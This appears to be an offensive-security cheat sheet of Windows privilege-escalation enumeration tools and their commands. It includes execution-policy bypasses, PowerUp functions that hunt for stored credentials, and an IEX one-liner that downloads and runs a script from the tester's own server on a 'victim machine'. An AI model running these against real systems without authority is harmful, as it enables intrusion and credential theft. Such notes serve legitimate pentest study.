Enumeration Scripts

1. General scans

• PowerUp

GitHub - PowerShellMafia/PowerSploit: PowerSploit - A PowerShell Post-Exploitation FrameworkGitHub

powershell -exec bypass -command "& { Import-Module .\PowerUp.ps1; Invoke-AllChecks; }"

Get-GPPPassword

Get-UnattendedInstallFile

Get-Webconfig

Get-ApplicationHost

Get-SiteListPassword

Get-CachedGPPPassword

Get-RegistryAutoLogon

With PowerUp.ps1 we can donwload and run the script with one step, first we need to add this lines at the end of the code:

$Types = $FunctionDefinitions | Add-Win32Type -Module $Module -Namespace 'PowerUp.NativeMethods'
$Advapi32 = $Types['advapi32']
$Kernel32 = $Types['kernel32']
			
Invoke-AllChecks

Then we start a python server in our machine and run the following command in the victim machine:

powershell IEX(New-Object Net.WebClient).downloadString('http://{My_IP}:{PORT}/PowerUp.ps1')

• SharpUp

GitHub - GhostPack/SharpUp: SharpUp is a C# port of various PowerUp functionality.GitHub

execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit UnquotedServicePath

execute-assembly C:\Tools\SharpUp\SharpUp\bin\Release\SharpUp.exe audit ModifiableServices

• winPEAS.exe

PEASS-ng/winPEAS/winPEASexe at master · carlospolop/PEASS-ngGitHub

• windows-privesc-check2.exe

GitHub - pentestmonkey/windows-privesc-check: Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows SystemsGitHub

• Seatbelt.exe -group=all

GitHub - GhostPack/Seatbelt: Seatbelt is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.GitHub

Seatbelt.exe -group=all -full

Seatbelt.exe -group=system -outputfile="C:\Temp\system.txt"

Seatbelt.exe -group=remote -computername=dc.theshire.local -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\""

• Powerless.bat

GitHub - gladiatx0r/Powerless: Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mindGitHub

• winPEAS.bat

PEASS-ng/winPEAS.bat at master · carlospolop/PEASS-ngGitHub

2. Search for CVE (Common Vulnerabilities and Exposures)

• Windows Exploit Suggester

GitHub - AonCyberLabs/Windows-Exploit-Suggester: This tool compares a targets patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.GitHub

systeminfo > systeminfo.txt

python windows-exploit-suggester.py --update

python windows-exploit-suggester.py --database <DATE>-mssb.xlsx --systeminfo systeminfo.txt

• wes.py (Windows Exploit Suggester next gen)

wesng/wes.py at master · bitsadmin/wesngGitHub

systeminfo > systeminfo.txt wmic qfe > qfe.txt python wes.py -u python wes.py systeminfo.txt qfe.txt

• WESNG (Windows Exploit Suggester Next Generation)

GitHub - bitsadmin/wesng: Windows Exploit Suggester - Next GenerationGitHub

1. First obtain systeminfo

• systeminfo

• systeminfo > systeminfo.txt

2. Then feed it to wesng

• python3 wes.py --update-wes

• python3 wes.py --update

• python3 wes.py systeminfo.txt

• Sherlock (Deprecated)

GitHub - rasta-mouse/Sherlock: PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities.GitHub

powershell -exec bypass -command "& { Import-Module .\Sherlock.ps1; Find-AllVulns; }"

• Watson (Implementation of Sherlock)

GitHub - rasta-mouse/Watson: Enumerate missing KBs and suggest exploits for useful Privilege Escalation vulnerabilitiesGitHub

3. Other enum and cve tools

• windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems

• PrivescCheck - Privilege Escalation Enumeration Script for Windows

• JAWS - Just Another Windows (Enum) Script

  • powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt

• BeRoot - Privilege Escalation Project - Windows / Linux / Mac